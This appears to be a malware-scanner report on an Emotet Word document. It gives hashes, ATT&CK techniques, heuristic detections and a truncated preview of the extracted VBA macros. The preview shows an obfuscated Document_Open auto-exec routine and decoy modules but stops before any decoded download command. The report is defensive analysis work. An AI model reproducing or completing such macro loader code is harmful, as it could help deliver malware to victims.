Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 eb43ccdf1cb6a24a…

MALICIOUS

Office (OLE)

Size: 211.7 KB
Created: 2020-02-06 22:10:00
Authoring application: Microsoft Office Word
First seen: 2020-07-24
MD5: 8b64c17d03f21a8633c66154cbe979f8
SHA-1: 4085f422049f209cf33dd0dae404881a76ec6a80
SHA-256: eb43ccdf1cb6a24a70614ad7df5b116a9f4f92864c60a344b6992a48cdcebc7a
Risk score: 262

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1140 Deobfuscate/Decode Files or Information

The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for Emotet. The critical heuristic 'OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER' indicates the macro is designed to execute commands, likely to download and run a secondary payload. The ClamAV detection explicitly names Emotet, further supporting the family attribution.

Heuristics (7)

  • ClamAV: Doc.Downloader.Emotet-7578627-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7578627-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12919 bytes
SHA-256: f4992f2a12d16edbd77ff218bdba59e660494c4377854ee978a384724889f5a5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Mgnfyhwvxjg"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
   If 121121 <> 715924 Then
mnYaLPCBoJ = 121121 + 1989
mmUPSPeNPb = 715924 - 2013
Else
MsgBox (CStr(mnYaLPCBoJ) & CStr(mmUPSPeNPb))
End If
For aDQW = 9 To 59
DoEvents
Next aDQW
eGOgHeluFI = "omJDjGORbm"
bmxvRTTBmQ = 749513
eGOgHeluFI = eGOgHeluFI & CStr(bmxvRTTBmQ)
BAOtZRDjDs = eGOgHeluFI
 
Qwtqdvuwif.Gdlqpuprb
End Sub

Attribute VB_Name = "Kvwjoasw"
Attribute VB_Base = "0{542A604D-9F02-46CB-A6E3-62B4F74D277E}{17B47A69-ACF5-4D48-9616-47755CE0AEDD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Mkbwhrfcxwfdy"
Attribute VB_Base = "0{A10F8CFB-A9E1-457A-B308-4127606D3C0B}{B3F476D3-B897-423F-8E93-BA1782D54A3B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Lncssbaykpw()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub

Attribute VB_Name = "Zegkifid"
Attribute VB_Base = "0{E8F7C5C9-15A9-4D53-B321-4660F8FFF625}{BF8FDED7-37E3-4DFC-A45D-5B09E17EC05B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Qgzzobvbu()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub

Attribute VB_Name = "Qgosaylmrhko"
Attribute VB_Base = "0{B8DE1C7F-9466-4464-BEFA-F6B894BFE2E9}{032D739C-6E92-4D71-8A46-331A7DB75002}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Squvtalp()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub

Attribute VB_Name = "Ltbmwoobvk"
Attribute VB_Base = "0{044A4292-C78D-476E-8D42-181F7B3E06A6}{7A5E36E6-B343-46E7-8129-39E49644BAB5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Rshhwrexgswxv()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub

Attribute VB_Name = "Gbhhbxcg"
Attribute VB_Base = "0{85182648-70E4-41E9-A1C6-299C4B2649C7}{4443565A-FACA-474C-88B9-3232A2D00526}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Zqctisssuycnl()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub

Attribute VB_Name = "Kmfswdqkoiao"
Attribute VB_Base = "0{E7A4F5B4-533C-4DC7-8034-99C6864D0D21}{7136435F-B05C-4AF5-8D96-4BE04FA95A91}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Aplakxbcdy()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub

Attribute VB_Name = "Fbmxspdn"
Attribute VB_Base = "0{292A5C65-03B4-4910-90FE-B6CD068430E9}{358BCE5D-F4F8-44C9-B5D3-BA1038A7A76F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Woksifolie()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub

Attribute VB_Name = "Tjrmagtiih"
Attribute VB_Base = "0{415A6833-4601-442C-850B-8B3F7CC
... (truncated)